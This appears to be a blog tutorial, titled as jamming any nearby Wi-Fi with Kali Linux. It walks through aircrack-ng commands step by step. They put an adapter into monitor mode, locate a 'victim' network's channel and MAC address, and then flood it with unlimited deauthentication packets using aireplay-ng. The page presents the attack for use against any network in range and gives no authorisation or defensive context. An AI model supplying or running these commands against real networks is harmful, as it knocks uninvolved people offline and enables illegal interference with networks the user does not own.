WIFI Jamming: Jam Any Wifi Near Around You With Kali Linux


In this tutorial we are going to learn that how to create a Wi-Fi jammer using WiFiSlax Linux. And jam any Wi-Fi network.
Before getting started if you you didn't Setuped Wifislax Go Read This Article.

As always I try to teach things in simple way along with a video guide 😊. I did here too.

After setting up Wifislax Boot it up and open Terminal. And type these commands.

Wifi Jammer Video Guide 




WiFi jammer Linux Commands


airmon-ng start wlan0

wlan0 < if your using an external WiFi adapter then type wlan1 

airodump-ng wlan0mon

Add (mon) in with wifi adapter name as you enabled monitoring mode in wifi . Like wlan0mon
After Your Compromised Wifi Shown in list stop Search by pressing ( ctrl + c )
Then type this command

airodump-ng -c (Put Channel Number Here) --bssid (put Mac address of victim Wifi here) wlan0mon

Here after -c you have to put channel number of your Victims wifi which is between 1-13 and then --bssid means compromised wifi mac address then wlan0mon mean your wifi adapter

aireplay-ng -0 0 -a (mac) wlan0mon


After -a type your compromised wifi mac address then type wlan0mon if your on pc and type wlan1mon if your using laptop


WiFi jammer kali linux github 


If you are a Linux user but you are not using WiFiSlax then you have to install Aircrack-ng.

Go here for more details Aircrack-ng